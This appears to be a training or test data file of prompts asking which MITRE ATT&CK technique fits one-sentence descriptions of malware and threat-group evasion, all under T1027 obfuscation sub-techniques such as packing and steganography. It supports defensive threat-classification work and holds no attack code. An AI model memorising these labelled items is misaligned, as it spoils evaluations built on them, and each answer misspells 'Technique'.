+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has packed malware to help avoid detection.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM packed some payloads using different types of packers, both known and custom.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has packed malware with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoustachedBouncer has used malware plugins packed with Themida.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Patchwork payload was packed with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used a .NET packer to obfuscate malicious files.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used UPX to obscure malicious code.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used UPX and Ezuri packer to pack its binaries.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The White Company has obfuscated their payloads through packing.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has packed malware and tools, including using VMProtect.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used multi-stage packers for exploit code.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor has come with a packed payload.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has used UPX packers for its payload DLL.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth uses a software packer called Pe123\RPolyCryptor.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has been packed with the UPX packer.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Versions of Babuk have been packed.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar has a variant with a packed payload.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has used the MPRESS packer and similar tools for obfuscation.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The first stage of COATHANGER is delivered as a packed file.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader has been packed with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's client component is packed with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop has been packed to help avoid detection.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CostaBricks can implement a custom-built virtual machine mechanism to obfuscate its code.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has a packed payload when delivered.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus's dropper can be packed with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet has the option to compress its payload using UPX or MPRESS.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A version of Daserf uses the MPRESS packer.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok is packed with an UPX executable packer.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can generate packed code modules.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has been delivered with encrypted resources and must be unpacked for execution.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor's payloads are custom-packed, archived and encrypted to prevent analysis.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has used custom packers to protect its payloads.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FYAnti has used ConfuserEx to pack its .NET module.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke has been regularly repacked by its operators to create large binaries and evade detection.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A FinFisher variant uses a custom packer.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has been packed for obfuscation.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy is packed for obfuscation.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 uses a custom packing algorithm.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has packed ELF files into other binaries.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has used the open source UPX executable packer.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro has the ability to pack its payload.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has packed and encrypted its loader module.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has been packed for obfuscation.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke has been packed with multiple layers of encryption.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has used several packing methods for obfuscation.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer has used UPX packed binaries.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has been packed with NSIS.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz has been packed with VMProtect and Themida.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used VMProtect to pack and protect files.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat was typically packed using UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall has been packed with Themida.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has used .NET packer tools to evade detection.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has a variant that is packed with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can encrypt and pack malicious payloads.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Raindrop used a custom packer for its Cobalt Strike payload, which was compressed using the LZMA algorithm.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some S-Type samples have been packed with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has used a packed installer file.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has been packed using a dark market crypter.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke has been packed with the UPX packer.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat's loader has been packed with the compressed ShimRat core DLL and the legitimate DLL for it to hijack.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark has been packed with Enigma Protector to obfuscate its contents.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has been packed with a custom packer to hide payloads.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has been packed with VMProtect.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tomiris has been packed with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma has been packed with Iz4 compression.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot leverages a custom packer to obfuscate its functionality.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos uses a custom packer.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN is initially packed.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has used packed DLL payloads.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy's Delphi variant was packed with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some ZeroT DLL files have been packed with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT payloads have been packed.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty packs a plugin with UPX.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Ghost, APT29 used steganography to hide payloads inside valid images.","Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors used packers that read pixel data from images contained in PE files' resource sections and build the next layer of execution from the data.","Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 uses steganography to send images to users that are embedded with shellcode.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has hidden malicious executables within PNG files.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used steganography to hide shellcode in a BMP image file.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used steganography to hide stolen data inside other files stored on Github.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has hidden encoded data for malware DLLs in a PNG.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ABK can extract a malicious Portable Executable (PE) from a photo.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger can extract backdoor malware from downloaded images.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBK can extract a malicious Portable Executable (PE) from a photo.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has used .PNG images within a zip file to build the executable.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol has obfuscated its main code routines within bitmap images as part of its anti-analysis techniques.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has embedded binaries within RC4 encrypted .png files.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Invoke-PSImage can be used to embed a PowerShell script within the pixels of a PNG file.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke has used image files to hide its loader component.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can hide its payload in BMP images hosted on compromised websites.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum's payload is encrypted and embedded within its loader, or within a legitimate PNG file.","Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke can use steganography to hide C2 information in images.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).","Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ProLock can use .jpg and .bmp files to store its payload.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can also embed data within a BMP image prior to exfiltration.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Raindrop used steganography to locate the start of its encoded payload within legitimate 7-Zip code.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has PE data embedded within JPEG files contained within Word documents.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RegDuke can hide data in images, including use of the Least Significant Bit (LSB).","Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: build_downer can extract malware from a downloaded JPEG.,"Tecnique: T1027.003 Obfuscated Files or Information: Steganography, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has compiled the source code for a downloader directly on the infected system using the built-in Microsoft.CSharp.CSharpCodeProvider class.,"Tecnique: T1027.004 Obfuscated Files or Information: Compile After Delivery, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.,"Tecnique: T1027.004 Obfuscated Files or Information: Compile After Delivery, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).","Tecnique: T1027.004 Obfuscated Files or Information: Compile After Delivery, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.","Tecnique: T1027.004 Obfuscated Files or Information: Compile After Delivery, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has used the csc.exe tool to compile a C# executable.,"Tecnique: T1027.004 Obfuscated Files or Information: Compile After Delivery, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can compile and execute source code sent to the compromised AD FS server via a specific HTTP POST.,"Tecnique: T1027.004 Obfuscated Files or Information: Compile After Delivery, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can compile and execute downloaded modules at runtime.,"Tecnique: T1027.004 Obfuscated Files or Information: Compile After Delivery, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has used AutoIt to compile the payload and main script into a single executable after delivery.,"Tecnique: T1027.004 Obfuscated Files or Information: Compile After Delivery, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors edited variable names within the Impacket suite to avoid automated detection.","Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles modified files based on the open-source project cryptcat in an apparent attempt to decrease anti-virus detection rates.","Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has been known to remove indicators of compromise from tools.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.","Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM ensured each payload had a unique hash, including by using different types of packers.","Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Based on comparison of Gazer versions, Turla made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.","Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike includes a capability to modify the Beacon payload to eliminate known signatures or unpacking methods.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Analysis of Daserf has shown that it regularly undergoes technical improvements to evade anti-virus detection.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The author of GravityRAT submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.","Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has undergone regular technical improvements in an attempt to evade detection.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can remove strings from binaries.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Find-AVSignature AntivirusBypass module can be used to locate single byte anti-virus signatures.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can make small changes to itself in order to change its checksum and hash value.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to SUNSPOT.","Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can scramble functions not to be executed again with random values.,"Tecnique: T1027.005 Obfuscated Files or Information: Indicator Removal from Tools, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.,"Tecnique: T1027.006 Obfuscated Files or Information: HTML Smuggling, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.,"Tecnique: T1027.006 Obfuscated Files or Information: HTML Smuggling, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has been delivered in ZIP files via HTML smuggling.,"Tecnique: T1027.006 Obfuscated Files or Information: HTML Smuggling, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.,"Tecnique: T1027.007 Obfuscated Files or Information: Dynamic API Resolution, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has used obfuscated API calls that are retrieved by their checksums.,"Tecnique: T1027.007 Obfuscated Files or Information: Dynamic API Resolution, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can hash then resolve API calls at runtime.,"Tecnique: T1027.007 Obfuscated Files or Information: Dynamic API Resolution, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can call and dynamically resolve hashed APIs.,"Tecnique: T1027.007 Obfuscated Files or Information: Dynamic API Resolution, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon can use a dynamic Windows hashing algorithm to map API components.,"Tecnique: T1027.007 Obfuscated Files or Information: Dynamic API Resolution, Tactic: TA0005 Defense Evasion"
